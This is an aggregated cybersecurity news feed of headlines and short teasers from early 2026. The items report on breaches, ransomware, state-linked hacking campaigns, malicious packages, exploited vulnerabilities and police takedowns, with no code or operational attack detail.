Sentinel Logo
Cybercrime isn't just a cover for Iran's government goons - it's a key part of their operations

Ransomware, malware-as-a-service, infostealers benefit MOIS, too

Iranian government-backed snoops are increasingly using cybercrime malware and ransomware infrastructure in their operations - not just hiding behind criminal masks as a cover for destructive cyber activity, according to security researchers.…

 [Link]
Crooks compromise WordPress sites to push infostealers via fake CAPTCHA prompts

Rapid7 says crims broke into more than 250 sites globally, including a US Senate candidate’s campaign page

Cyber baddies quietly compromised legitimate WordPress websites, including the campaign site of a US Senate candidate, turning them into launchpads for a global infostealer operation.…

 [Link]
Fake job applications pack malware that kills EDR before stealing data

Russian-speaking attackers lure HR staff into downloading ISO files that disable defenses

A Russian-speaking cyber criminal is targeting corporate HR teams with fake CVs that quietly install malware which can disable security tools before stealing data from infected machines.…

 [Link]
Ericsson blames vendor vishing slip-up for breach exposing thousands of records

Crooks used simple phone scam to compromise vendor account, spilling personal and financial data belonging to more than 15,000 people

A voice-phishing scam targeting one of Ericsson's service providers has exposed the personal data of more than 15,000 individuals after attackers sweet-talked an employee into handing over access.…

 [Link]
Polish cops bust alleged teen DDoS kit sellers – youngest just 12

Kids profited from tools used to attack popular websites, say officials

Polish police have referred seven suspected juvenile cybercriminals to family court over an alleged scheme to flog DDoS kits online.…

 [Link]
ShinyHunters claims more high-profile victims in latest Salesforce customers data heist

And they abused a Mandiant-developed open source tool in the attacks

ShinyHunters told The Register that it has stolen data from about 100 high-profile companies in its latest Salesforce customer data heist, including Salesforce itself.…

 [Link]
EV charger biz ELECQ zapped by ransomware crooks, customer contact data stolen

An attack on the company’s AWS platform may have exposed customers' names and home addresses

Exclusive  ELECQ, maker of smart electric vehicle (EV) chargers, is warning customers that their personal details may have been stolen in a ransomware attack that encrypted and copied user data from its cloud systems.…

 [Link]
Russian cybercrims phish their way into officials' Signal and WhatsApp accounts

Dutch spies flag large-scale campaign to hijack secure messaging accounts

Russian-linked hackers are trying to break into the Signal and WhatsApp accounts of government officials, journalists, and military personnel globally – not by cracking encryption, but by simply tricking people into handing over the keys.…

 [Link]
FBI is investigating breach that may have hit its wiretapping tools

PLUS: Europol takes down two crime gangs; LastPass users phished (again); Crooks increase crypto hauls; And more

Infosec In Brief  The FBI is investigating a breach of its systems which reportedly affected systems related to wiretapping and surveillance.…

 [Link]
Spyware disguised as emergency-alert app sent to Israeli smartphones

Steals SMS messages, location data, contacts … and delivers it to Hamas-linked crew

Hamas-linked attackers are dropping spyware disguised as an emergency-alert app on Israelis' smartphones via SMS messages, according to security researchers.…

 [Link]
Cisco warns of two more SD-WAN bugs under active attack

Switchzilla says flaws could allow file overwrites or privilege escalation

Just when network admins thought the Cisco SD-WAN patch queue might finally be shrinking, Switchzilla has confirmed miscreants are exploiting more vulnerabilities in its SD-WAN management software.…

 [Link]
Microsoft spots ClickFix campaign getting users to self-pwn on Windows Terminal

Crooks tweak familiar copy-paste ruse so that victims run malicious commands themselves

A new twist on the long-running ClickFix scam is now tricking Windows users into launching Windows Terminal and pasting malware into it themselves – handing the credential-stealing Lumma infostealer the keys to their browser vault.…

 [Link]
Transport for London says 2024 breach affected 7M customers, not 5,000

Attackers accessed systems holding data tied to millions of Oyster and contactless users

Transport for London has confirmed that a 2024 breach exposed the data of more than 7 million people – a far larger crowd than the few thousand customers originally warned that their details might be at risk.…

 [Link]
Iran intelligence backdoored US bank, airport, software outfit networks

MOIS-linked MuddyWater crew has a new, custom implant

An Iranian cyber crew believed to be part of the Iranian Ministry of Intelligence and Security (MOIS) has been embedded in multiple US companies' networks - including a bank, software firm, and airport, among others - since the beginning of February, with more activity in the days following the US and Israeli military strikes, according to security researchers.…

 [Link]
'Hundreds' of Iranian hacking attempts have hit surveillance cameras since the missile strikes

Attack infrastructure attributed to 'several Iran-nexus threat actors'

Multiple Iranian hacking crews have been targeting internet-connected surveillance cameras across Israel and other Middle Eastern countries since the war started on February 28, according to Check Point security researchers. …

 [Link]
Malware-laced OpenClaw installers get Bing AI search boost

Think before you download

OpenClaw, the AI agent that can manage just about anything, is risky all by itself, but now fake installers for it are wreaking havoc. Users who searched Bing’s AI results for “OpenClaw Windows” were directed to a malicious GitHub repository that delivered information stealers and GhostSocks onto their machines.…

 [Link]
LexisNexis confirms data breach at Legal & Professional arm, some customer records affected

Crooks claim 2 GB haul from AWS instance via React2Shell exploit

Data analytics giant LexisNexis has confirmed its Legal & Professional division suffered a data breach days after the Fulcrumsec cybercrime crew claimed responsibility for the hack.…

 [Link]
Kaspersky dismisses claims Coruna iPhone exploit kit is connected to NSA-linked operation

Follows suggestions iPhone-pwning toolset bears hallmarks of zero-days that targeted Russian diplomats

Russian cybersecurity outfit Kaspersky is waving away claims that an iPhone exploit kit recently uncovered by Google was developed by the same people who were behind a group of zero-days that allegedly compromised thousands of Russian diplomats in a 2023 campaign.…

 [Link]
Dev stunned by $82K Gemini bill after unknown API key thief goes to town

Probably not an isolated incident only as researchers have already found 2,863 live API keys exposed

A developer says their company is on the hook for more than $82,000 in unauthorized charges after a stolen Google Gemini API key racked massive usage costs up in just 48 hours.…

 [Link]
Turns out most cybercriminals are old enough to know better

Law enforcement data shows profit-driven cybercrime is dominated by 35- to 44-year-olds, not script kiddies

Contrary to what some believe, cybercrime is not a kids' game. Middle-aged adults, not teenagers, now make up the biggest chunk of people getting busted.…

 [Link]
Cybercriminals swipe 15.8M medical records from French doctors ministry

Third-party software supplier breached leading to leak of notes

Around 15.8 million administrative files were stolen after attackers breached a software supplier to France's health ministry.…

 [Link]
Phish of the day: Microsoft OAuth scams abuse redirects for malware delivery

Crims hope for payday from malicious payloads rather than stealing access tokens

Microsoft has warned organizations about ongoing OAuth abuse scams that use phishing emails and URL redirects to infect victims' machines with malware and take over their devices.…

 [Link]
Iran's cyberwar has begun

'Expect elevated activity for the foreseeable future'

Iranian hackers have launched spying expeditions, digital probes, and distributed denial of service (DDoS) attacks in the wake of the US and Israel launching missile strikes over the weekend, and security researchers urge organizations to expect more cyber intrusions as the war continues.…

 [Link]
UK businesses told to brace cyber defenses amid Iran conflict risk

NCSC urges all to review posture as escalating tensions increase risk of indirect digital spillover

The UK's cybersecurity agency is warning British organizations to brace for potential digital blowback as the Middle East conflict spills further into the online world.…

 [Link]
Scammers try to SIM-swap Dubai citizens hours after Iranian missile strikes

Vulnerable citizens targeted by criminals purporting to represent fake police crisis department

Scammers targeted Dubai citizens mere hours after missiles struck the city, attempting to gain access to their bank accounts, police have warned.…

 [Link]
South Korea’s tax office apologizes for leaking seed phrase to seized crypto

Went from triumph at having busted tax dodgers to embarrassment at losing the proceeds

South Korea’s National Tax Service has apologized after it leaked passwords to a stash of stolen crypto, which parties unknown used to make off with the digi-cash.…

 [Link]
Double whammy: Steaelite RAT bundles data theft, ransomware in one evil tool

Credential and cryptocurrency theft, live surveillance, ransomware - an attacker's Swiss Army knife

A new remote access trojan (RAT) being sold on cybercrime networks enables double extortion attacks on Windows machines by bundling ransomware and data theft, along with credential and cryptocurrency stealers, live surveillance, and a whole host of other illicit capabilities, all controllable from a centralized dashboard.…

 [Link]
Suspected Nork digital intruders caught breaking into US healthcare, education orgs

Who is knocking at the Dohdoor?

Digital intruders with possible links to North Korea have been infecting US education and healthcare sectors with a never-before-seen backdoor since at least December, according to security researchers.…

 [Link]
Ransomware payments cratered in 2025, but attacks surged to record highs

Smaller crews piled in as old names splintered and rebranded

Ransomware payments cratered in 2025, but it seems like the cybercrooks launching the attacks didn't get the memo.…

 [Link]
French DIY etailer ManoMano admits customer data stolen

Crooks claim they helped themselves to over 37M accounts during January hit on subcontractor

Updated  French online marketplace ManoMano is warning customers their personal data was siphoned off after a cyberattack hit one of its customer support subcontractors – and criminals are already claiming the haul is far larger than the company's carefully worded notice suggests.…

 [Link]
Cops back Dutch telco Odido after second wave of ShinyHunters leaks

Company refuses to pay ransom as attackers threaten larger daily dumps

The Netherlands' national police is backing Odido's refusal to pay a ransom after ShinyHunters leaked a second round of records belonging to the telco.…

 [Link]
Scattered Lapsus$ Hunters auditioning female voices to sharpen social engineering

Telegram posts promise up to $1,000 per call as gang refines IT helpdesk ruse

Prolific cybercrime crew Scattered Lapsus$ Hunters (SLSH) is reportedly recruiting women in the hope of improving its social engineering success.…

 [Link]
Google catches Beijing spies using Sheets to spread espionage across 4 continents

UNC2814 historically targets governments and telcos

A China-linked crew found a unique formula for attacking telcos and government orgs across the Americas, Asia, and Africa in its latest round of intrusions. Google's threat intelligence, along with unnamed industry partners, disrupted the gang, which used the Chocolate Factory's own spreadsheet tools as part of its exploits.…

 [Link]
Ex-L3Harris exec jailed 7 years for selling exploits to Russia

Former Trenchant manager profited millions from cyber tools reserved for the US

The former general manager of L3Harris's cyber arm will spend the next seven years behind bars for selling trade secrets to Russia.…

 [Link]
Wynn Resorts takes attacker's word for it that stolen staff data was deleted

Security pros question assurances as company offers staff credit monitoring

Wynn Resorts has confirmed that employee data was stolen from its servers, and is taking the hackers' word that they've since deleted it.…

 [Link]
OpenAI says Chinese cops used ChatGPT to plan and track smear ops against opponents

Note to secret agents: ChatGPT is NOT a private diary

A ChatGPT user with links to Chinese law enforcement tried to use the AI chatbot to run smear campaigns targeting the Japanese prime minister and other critics of the Chinese Communist Party, according to OpenAI's latest report on malicious uses of its models.…

 [Link]
North Korea's Lazarus Group targets healthcare orgs with Medusa ransomware

New ransomware of choice, same critical targets

North Korea’s Lazarus Group appears to have added another tool to its kit. It has begun using Medusa ransomware in extortion attacks targeting at least one US healthcare organization and an unnamed victim in the Middle East, according to Symantec and Carbon Black threat hunters.…

 [Link]
Korean cops charge teens over bike hire breach that exposed data on 4.62M riders

Public prosecutor mulls sentencing following investigations into two separate attacks

Two South Korean teenagers were this week charged with breaching Seoul's public bike service, Ttareungyi.…

 [Link]
Suspected Anonymous members detained in Spain over post-flood DDoS blitz

Quartet accused of attacking public institutions, claiming the government was responsible for 2024 tragedy

Spanish police say four self-proclaimed members of Anonymous are in custody after allegedly carrying out several cyberattacks on public authorities in the wake of the 2024 DANA floods.…

 [Link]
AWS says more than 600 FortiGate firewalls hit in AI-augmented campaign

Off-the-shelf tools helped Russian-speaking cybercrime group run riot

Cybercriminals armed with off-the-shelf generative AI tools compromised more than 600 internet-exposed FortiGate firewalls across 55 countries in just over a month, according to a new incident report from AWS.…

 [Link]
Attacker gets into France's database listing all bank accounts, makes off with 1.2 million records

PLUS: Unpatched Ivanti boxes under attack; 0APT might not be a scam; AI gets better at helping cyber-scum; And more

Infosec In Brief  An unknown attacker accessed the French government’s database listing every bank account in the country and made off with 1.2 million records.…

 [Link]
PayPal app code error leaked personal info and a 'few' unauthorized transactions

About 100 customers affected

PayPal has notified about 100 customers that their personal information was exposed online during a code change gone awry, and in a few of these cases, people saw unauthorized transactions on their accounts.…

 [Link]
ShinyHunters demands $1.5M not to leak Vegas casino and resort chain data

What happens in Vegas…

Las Vegas hotel and casino giant Wynn Resorts appears to be the latest victim of data-grabbing and extortion gang ShinyHunters.…

 [Link]
Ukrainian gets five years for helping North Koreans secure US tech jobs

Polish arrest leads to extradition and federal prison sentence

Ukrainian national Oleksandr Didenko will spend the next five years behind bars in the US for his involvement in helping North Korean IT workers secure fraudulent employment.…

 [Link]
Crims create fake remote management vendor that actually sells a RAT

$300 a month buys you a backdoor that looks like legit software

Researchers at Proofpoint late last month uncovered what they describe as a "weird twist" on the growing trend of criminals abusing remote monitoring and management software (RMM) as their preferred attack tools.…

 [Link]
Crims hit a $20M jackpot via malware-stuffed ATMs

FBI warns these cyber-physical attacks are on the rise

Thieves stole more than $20 million from compromised ATMs last year using a malware-assisted technique that the FBI says is on the uptick across the United States.…

 [Link]
Adidas investigates third-party data breach after criminals claim they pwned the sportswear giant

'Potential data protection incident' at an 'independent licensing partner,' we're told

Adidas has confirmed it is investigating a third-party breach at one of its partner companies after digital thieves claimed they stole information and technical data from the German sportswear giant.…

 [Link]
ShinyHunters claims it drove off with 1.7M CarGurus records

Latest in a rash of grab-and-leak data incidents

updated  CarGurus purportedly suffered a data breach with 1.7 million corporate records stolen, according to a notorious cybercrime crew that posted the online vehicle marketplace on its leak site on Wednesday.…

 [Link]
Fraudster hacked hotel system, paid 1 cent for luxury rooms, Spanish cops say

'First time we have detected a crime using this method,' cops say

Spanish police arrested a hacker who allegedly manipulated a hotel booking website, allowing him to pay one cent for luxury hotel stays. He also raided the mini-bars and didn't settle some of those tabs, police say.…

 [Link]
Deutsche Bahn back on track after DDoS yanks the brakes

National rail bookings and timetables disrupted for nearly 24 hours

If you wanted to book a train trip in Germany recently, you would have been out of luck. The country's national rail company says that its services were disrupted for hours because of a cyberattack.…

 [Link]
This Melbourne data centre runs on human brain cells
Neurons already taught to play 'Doom' using Cortical Labs tech.
 [Link]
ACS changes leadership
Dr Prins Ralston steps in as interim CEO.
 [Link]
Tai chi scams target elderly Australians
Scamwatch warns of financial malware.
 [Link]
Bunnings ruling no ?green light? for facial recognition
Privacy Commissioner says retail still faces scrutiny.
 [Link]
How Mark learned to code in a Sydney prison
Inside the program getting inmates into tech jobs.
 [Link]
US developing system to refund illegal tariffs
Current technology not suited to mammoth task.
 [Link]
WFH to become legal right for Victorians from 1 September
Business groups furious.
 [Link]
Porn sites block Australians in protest over age checks
RedTube, YouPorn and more react to new regulations.
 [Link]
CISOs warned as Iran conflict spills into cyberspace
Cyber, AI now strategic battlegrounds.
 [Link]
Laws not keeping pace with workplace surveillance
?Intrusive? wearable neurotechnology and eye tracking slammed.
 [Link]
Why 2026 Is the Perfect Time To Pivot Into Cybersecurity

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Mar. 10, 2026 – Read the full story in EC-Council The late 1990s dot-com boom saw internet adoption explode, venture capital pour in, new roles appear overnight, and salaries and opportunity follow.

The post Why 2026 Is the Perfect Time To Pivot Into Cybersecurity appeared first on Cybercrime Magazine.

 [Link]
Is Cybersecurity the Dark Horse for Venture Investors During the Iran Conflict?

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Mar. 9, 2026 – Read the full story in Forbes If Defense Tech is the loud winner during the Iran conflict, Cybersecurity is the quiet one, and the opportunity is just as large,

The post Is Cybersecurity the Dark Horse for Venture Investors During the Iran Conflict? appeared first on Cybercrime Magazine.

 [Link]
AI Didn’t Invent Social Engineering, It Made It Worse

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Mar. 5, 2026 – Listen to the podcast In the latest episode of “CISO Confidential“, a series on the popular Cybercrime Magazine Podcast sponsored by Doppel, host Charlie Osborne asked Deneen DeFiore, VP and

The post AI Didn’t Invent Social Engineering, It Made It Worse appeared first on Cybercrime Magazine.

 [Link]
Examining North Korea’s Cybercrime Economy

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Mar. 4, 2026 – Read the full story in Finextra It is estimated that one third to a half of North Korea’s budget comes from cyberfraud and extortion. Finextra reports that most of these

The post Examining North Korea’s Cybercrime Economy appeared first on Cybercrime Magazine.

 [Link]
Hollywood’s Ethical Hacker On The Cybercrime Magazine Podcast

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Mar. 3, 2026 – Listen to the podcast Ralph Echemendia is a world-renowned cybersecurity expert, known internationally by his alter ego “The Ethical Hacker.” In 2015, WIRED called Echemendia “Hollywood’s go-to digital

The post Hollywood’s Ethical Hacker On The Cybercrime Magazine Podcast appeared first on Cybercrime Magazine.

 [Link]
Software Supply Chain Risk: The Growing Threat Landscape

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Mar. 2, 2026 – Read the full story from Ox Security Cybersecurity Ventures predicted that global damage costs resulting from software supply chain attacks would reach $60 billion USD by 2025, and $138

The post Software Supply Chain Risk: The Growing Threat Landscape appeared first on Cybercrime Magazine.

 [Link]
WebcamGate 2009: A High School’s Laptop Initiative Turned Into A National Spying Scandal

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 27, 2026 – Watch the YouTube Short Cybercrime Magazine’s latest YouTube Short video, produced by Taylor Fox, looks back at a riveting privacy and surveillance story that gripped students, parents, and educators

The post WebcamGate 2009: A High School’s Laptop Initiative Turned Into A National Spying Scandal appeared first on Cybercrime Magazine.

 [Link]
The Cascading Economic Ripple Effects Of Cybercrime

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 26, 2026 – Read the full story in BitGuardian The staggering prediction by Cybersecurity Ventures that global cybercrime damages would reach $10.5 trillion USD annually by 2025 has served as a wake-up call

The post The Cascading Economic Ripple Effects Of Cybercrime appeared first on Cybercrime Magazine.

 [Link]
CISO Confidential Launches On The Cybercrime Magazine Podcast

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 25, 2026 – Listen to the podcast “CISO Confidential” is a new series on the Cybercrime Magazine Podcast, brought to our listeners by Doppel, a cybersecurity company on a mission to protect

The post CISO Confidential Launches On The Cybercrime Magazine Podcast appeared first on Cybercrime Magazine.

 [Link]
Long Island Medium Star Theresa Caputo Meets Cybercrime Magazine – Live!

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 23, 2026 In 2024, Long Island Medium star Theresa Caputo slammed online scammers and begged fans not to send money to them. The reality star warned fans about many social media users impersonating her

The post Long Island Medium Star Theresa Caputo Meets Cybercrime Magazine – Live! appeared first on Cybercrime Magazine.

 [Link]
Microsoft Patches 84 Flaws in March Patch Tuesday, Including Two Public Zero-Days
Microsoft on Tuesday released patches for a set of 84 new security vulnerabilities affecting various software components, including two that have been listed as publicly known. Of these, eight are rated Critical, and 76 are rated Important in severity. Forty-six of the patched vulnerabilities relate to privilege escalation, followed by 18 remote code execution, 10 information disclosure, four
 [Link]
UNC6426 Exploits nx npm Supply-Chain Attack to Gain AWS Admin Access in 72 Hours
A threat actor known as UNC6426 leveraged keys stolen following the supply chain compromise of the nx npm package last year to completely breach a victim's cloud environment within a span of 72 hours. The attack started with the theft of a developer's GitHub token, which the threat actor then used to gain unauthorized access to the cloud and steal data. "The threat actor, UNC6426, then used this
 [Link]
Five Malicious Rust Crates and AI Bot Exploit CI/CD Pipelines to Steal Developer Secrets
Cybersecurity researchers have discovered five malicious Rust crates that masquerade as time-related utilities to transmit .env file data to the threat actors. The Rust packages, published to crates.io, are listed below - chrono_anchor dnp3times time_calibrator time_calibrators time-sync The crates, per Socket, impersonate timeapi.io and were published between late February and early March
 [Link]
FortiGate Devices Exploited to Breach Networks and Steal Service Account Credentials
Cybersecurity researchers are calling attention to a new campaign where threat actors are abusing FortiGate Next-Generation Firewall (NGFW) appliances as entry points to breach victim networks.  The activity involves the exploitation of recently disclosed security vulnerabilities or weak credentials to extract configuration files containing service account credentials and network topology
 [Link]
How to Stop AI Data Leaks: A Webinar Guide to Auditing Modern Agentic Workflows
Artificial Intelligence (AI) is no longer just a tool we talk to; it is a tool that does things for us. These are called AI Agents. They can send emails, move data, and even manage software on their own. But there is a problem. While these agents make work faster, they also open a new "back door" for hackers. The Problem: "The Invisible Employee" Think of an AI Agent like a new employee who has
 [Link]
KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet
Cybersecurity researchers have discovered a new malware called KadNap that's primarily targeting Asus routers to enlist them into a botnet for proxying malicious traffic. The malware, first detected in the wild in August 2025, has expanded to over 14,000 infected devices, with more than 60% of victims located in the U.S., according to the Black Lotus Labs team at Lumen. A lesser number of
 [Link]
New "LeakyLooker" Flaws in Google Looker Studio Could Enable Cross-Tenant SQL Queries
Cybersecurity researchers have disclosed nine cross-tenant vulnerabilities in Google Looker Studio that could have permitted attackers to run arbitrary SQL queries on victims' databases and exfiltrate sensitive data within organizations' Google Cloud environments. The shortcomings have been collectively named LeakyLooker by Tenable. There is no evidence that the vulnerabilities were exploited in
 [Link]
The Zero-Day Scramble is Avoidable: A Guide to Attack Surface Reduction
You can't control when the next critical vulnerability drops. You can control how much of your environment is exposed when it does. The problem is that most teams have more internet-facing exposure than they realise. Intruder's Head of Security digs into why this happens and how teams can manage it deliberately. Time-to-exploit is shrinking The larger and less controlled your attack surface is,
 [Link]
APT28 Uses BEARDSHELL and COVENANT Malware to Spy on Ukrainian Military
The Russian state-sponsored hacking group tracked as APT28 has been observed using a pair of implants dubbed BEARDSHELL and COVENANT to facilitate long‑term surveillance of Ukrainian military personnel. The two malware families have been put to use since April 2024, ESET said in a new report shared with The Hacker News. APT28, also tracked as Blue Athena, BlueDelta, Fancy Bear, Fighting Ursa,
 [Link]
Threat Actors Mass-Scan Salesforce Experience Cloud via Modified AuraInspector Tool
Salesforce has warned of an increase in threat actor activity that's aimed at exploiting misconfigurations in publicly accessible Experience Cloud sites by making use of a customized version of an open-source tool called AuraInspector. The activity, per the company, involves the exploitation of customers' overly permissive Experience Cloud guest user configurations to obtain access to sensitive
 [Link]
CISA Flags SolarWinds, Ivanti, and Workspace One Vulnerabilities as Actively Exploited
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerability list is as follows - CVE-2021-22054 (CVSS score: 7.5) - A server-side request forgery (SSRF) vulnerability in Omnissa Workspace One UEM (formerly VMware Workspace One UEM) that
 [Link]
Malicious npm Package Posing as OpenClaw Installer Deploys RAT, Steals macOS Credentials
Cybersecurity researchers have discovered a malicious npm package that masquerades as an OpenClaw installer to deploy a remote access trojan (RAT) and steal sensitive data from compromised hosts. The package, named "@openclaw-ai/openclawai," was uploaded to the registry by a user named "openclaw-ai" on March 3, 2026. It has been downloaded 178 times to date. The library is still available for
 [Link]
UNC4899 Breached Crypto Firm After Developer AirDropped Trojanized File to Work Device
The North Korean threat actor known as UNC4899 is suspected to be behind a sophisticated cloud compromise campaign targeting a cryptocurrency organization in 2025 to steal millions of dollars in cryptocurrency. The activity has been attributed with moderate confidence to the state-sponsored adversary, which is also tracked under the cryptonyms Jade Sleet, PUKCHONG, Slow Pisces, and
 [Link]
⚡ Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack & Vibe-Coded Malware
Another week in cybersecurity. Another week of "you've got to be kidding me." Attackers were busy. Defenders were busy. And somewhere in the middle, a whole lot of people had a very bad Monday morning. That's kind of just how it goes now. The good news? There were some actual wins this week. Real ones. The kind where the good guys showed up, did the work, and made a dent. It doesn't always
 [Link]
Can the Security Platform Finally Deliver for the Mid-Market?
Mid-market organizations are constantly striving to achieve security levels on a par with their enterprise peers. With heightened awareness of supply chain attacks, your customers and business partners are defining the security level you must meet. What if you could be the enabler for your organization to remain competitive — and help win business — by easily demonstrating that you meet these
 [Link]
Chrome Extension Turns Malicious After Ownership Transfer, Enabling Code Injection and Data Theft
Two Google Chrome extensions have turned malicious after what appears to be a case of ownership transfer, offering attackers a way to push malware to downstream customers, inject arbitrary code, and harvest sensitive data. The extensions in question, both originally associated with a developer named "akshayanuonline@gmail.com" (BuildMelon), are listed below - QuickLens - Search Screen with
 [Link]
Web Server Exploits and Mimikatz Used in Attacks Targeting Asian Critical Infrastructure
High-value organizations located in South, Southeast, and East Asia have been targeted by a Chinese threat actor as part of a years-long campaign. The activity, which has targeted aviation, energy, government, law enforcement, pharmaceutical, technology, and telecommunications sectors, has been attributed by Palo Alto Networks Unit 42 to a previously undocumented threat activity group dubbed
 [Link]
OpenAI Codex Security Scanned 1.2 Million Commits and Found 10,561 High-Severity Issues
OpenAI on Friday began rolling out Codex Security, an artificial intelligence (AI)-powered security agent that's designed to find, validate, and propose fixes for vulnerabilities. The feature is available in a research preview to ChatGPT Pro, Enterprise, Business, and Edu customers via the Codex web with free usage for the next month. "It builds deep context about your project to identify
 [Link]
Anthropic Finds 22 Firefox Vulnerabilities Using Claude Opus 4.6 AI Model
Anthropic on Friday said it discovered 22 new security vulnerabilities in the Firefox web browser as part of a security partnership with Mozilla. Of these, 14 have been classified as high, seven have been classified as moderate, and one has been rated low in severity. The issues were addressed in Firefox 148, released late last month. The vulnerabilities were identified over a two-week period in
 [Link]
Transparent Tribe Uses AI to Mass-Produce Malware Implants in Campaign Targeting India
The Pakistan-aligned threat actor known as Transparent Tribe has become the latest hacking group to embrace artificial intelligence (AI)-powered coding tools to strike targets with various implants. The activity is designed to produce a "high-volume, mediocre mass of implants" that are developed using lesser-known programming languages like Nim, Zig, and Crystal and rely on trusted services like
 [Link]
Multi-Stage VOID#GEIST Malware Delivering XWorm, AsyncRAT, and Xeno RAT
Cybersecurity researchers have disclosed details of a multi-stage malware campaign that uses batch scripts as a pathway to deliver various encrypted remote access trojan (RATs) payloads that correspond to XWorm, AsyncRAT, and Xeno RAT. The stealthy attack chain has been codenamed VOID#GEIST by Securonix Threat Research. At a high level, the obfuscated batch script is used to deploy a second
 [Link]
The MSP Guide to Using AI-Powered Risk Management to Scale Cybersecurity
Scaling cybersecurity services as an MSP or MSSP requires technical expertise and a business model that delivers measurable value at scale. Risk-based cybersecurity is the foundation of that model. When done right, it builds client trust, increases upsell opportunities, and drives recurring revenue. But to deliver this consistently and efficiently, you need the right technology and processes.
 [Link]
Iran-Linked MuddyWater Hackers Target U.S. Networks With New Dindoor Backdoor
New research from Broadcom's Symantec and Carbon Black Threat Hunter Team has discovered evidence of an Iranian hacking group embedding itself in several U.S. companies' networks, including banks, airports, non-profit, and the Israeli arm of a software company. The activity has been attributed to a state-sponsored hacking group called MuddyWater (aka Seedworm). It's affiliated with the Iranian
 [Link]
China-Linked Hackers Use TernDoor, PeerTime, BruteEntry in South American Telecom Attacks
A China-linked advanced persistent threat (APT) actor has been targeting critical telecommunications infrastructure in South America since 2024, targeting Windows and Linux systems and edge devices with three different implants. The activity is being tracked by Cisco Talos under the moniker UAT-9244, describing it as closely associated with another cluster known as FamousSparrow. It's worth
 [Link]
Microsoft Reveals ClickFix Campaign Using Windows Terminal to Deploy Lumma Stealer
Microsoft on Thursday disclosed details of a new widespread ClickFix social engineering campaign that has leveraged the Windows Terminal app as a way to activate a sophisticated attack chain and deploy the Lumma Stealer malware. The activity, observed in February 2026, makes use of the terminal emulator program instead of instructing users to launch the Windows Run dialog and paste a command
 [Link]
Hikvision and Rockwell Automation CVSS 9.8 Flaws Added to CISA KEV Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added two security flaws impacting Hikvision and Rockwell Automation products to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The critical-severity vulnerabilities are listed below - CVE-2017-7921 (CVSS score: 9.8) - An improper authentication vulnerability affecting
 [Link]
Cisco Confirms Active Exploitation of Two Catalyst SD-WAN Manager Vulnerabilities
Cisco has disclosed that two more vulnerabilities affecting Catalyst SD-WAN Manager (formerly SD-WAN vManage) have come under active exploitation in the wild. The vulnerabilities in question are listed below - CVE-2026-20122 (CVSS score: 7.1) - An arbitrary file overwrite vulnerability that could allow an authenticated, remote attacker to overwrite arbitrary files on the local file system.
 [Link]
Preparing for the Quantum Era: Post-Quantum Cryptography Webinar for Security Leaders
Most organizations assume encrypted data is safe. But many attackers are already preparing for a future where today’s encryption can be broken. Instead of trying to decrypt information now, they are collecting encrypted data and storing it so it can be decrypted later using quantum computers. This tactic—known as “harvest now, decrypt later”—means sensitive data transmitted today could become
 [Link]
ThreatsDay Bulletin: DDR5 Bot Scalping, Samsung TV Tracking, Reddit Privacy Fine & More
Some weeks in cybersecurity feel routine. This one doesn’t. Several new developments surfaced over the past few days, showing how quickly the threat landscape keeps shifting. Researchers uncovered fresh activity, security teams shared new findings, and a few unexpected moves from major tech companies also drew attention. Together, these updates offer a useful snapshot of what is happening
 [Link]
Dust Specter Targets Iraqi Officials with New SPLITDROP and GHOSTFORM Malware
A suspected Iran-nexus threat actor has been attributed to a campaign targeting government officials in Iraq by impersonating the country's Ministry of Foreign Affairs to deliver a set of never-before-seen malware. Zscaler ThreatLabz, which observed the activity in January 2026, is tracking the cluster under the name Dust Specter. The attacks, which manifest in the form of two different
 [Link]
Where Multi-Factor Authentication Stops and Credential Abuse Starts
Organizations typically roll out multi-factor authentication (MFA) and assume stolen passwords are no longer enough to access systems. In Windows environments, that assumption is often wrong. Attackers still compromise networks every day using valid credentials. The issue is not MFA itself, but coverage.  Enforced through an identity provider (IdP) such as Microsoft Entra ID, Okta, or
 [Link]
APT28-Linked Campaign Deploys BadPaw Loader and MeowMeow Backdoor in Ukraine
Cybersecurity researchers have disclosed details of a new Russian cyber campaign that has targeted Ukrainian entities with two previously undocumented malware families named BadPaw and MeowMeow. "The attack chain initiates with a phishing email containing a link to a ZIP archive. Once extracted, an initial HTA file displays a lure document written in Ukrainian concerning border crossing appeals
 [Link]
Europol-Led Operation Takes Down Tycoon 2FA Phishing-as-a-Service Linked to 64,000 Attacks
Tycoon 2FA, one of the prominent phishing-as-a-service (PhaaS) toolkits that allowed cybercriminals to stage adversary-in-the-middle (AitM) credential harvesting attacks at scale, was dismantled by a coalition of law enforcement agencies and security companies. The subscription-based phishing kit, which first emerged in August 2023, was described by Europol as one of the largest phishing
 [Link]
FBI and Europol Seize LeakBase Forum Used to Trade Stolen Credentials
A joint law enforcement operation has dismantled LeakBase, one of the world's largest online forums for cybercriminals to buy and sell stolen data and cybercrime tools. The LeakBase forum, per the U.S. Department of Justice (DoJ), had over 142,000 members and more than 215,000 messages between members as of December 2025. Those attempting to access the forum's website ("leakbase[.]la") are now
 [Link]
149 Hacktivist DDoS Attacks Hit 110 Organizations in 16 Countries After Middle East Conflict
Cybersecurity researchers have warned of a surge in retaliatory hacktivist activity following the U.S.-Israel coordinated military campaign against Iran, codenamed Epic Fury and Roaring Lion. "The hacktivist threat in the Middle East is highly lopsided, with two groups, Keymous+ and DieNet, driving nearly 70% of all attack activity between February 28 and March 2," Radware said in a Tuesday
 [Link]
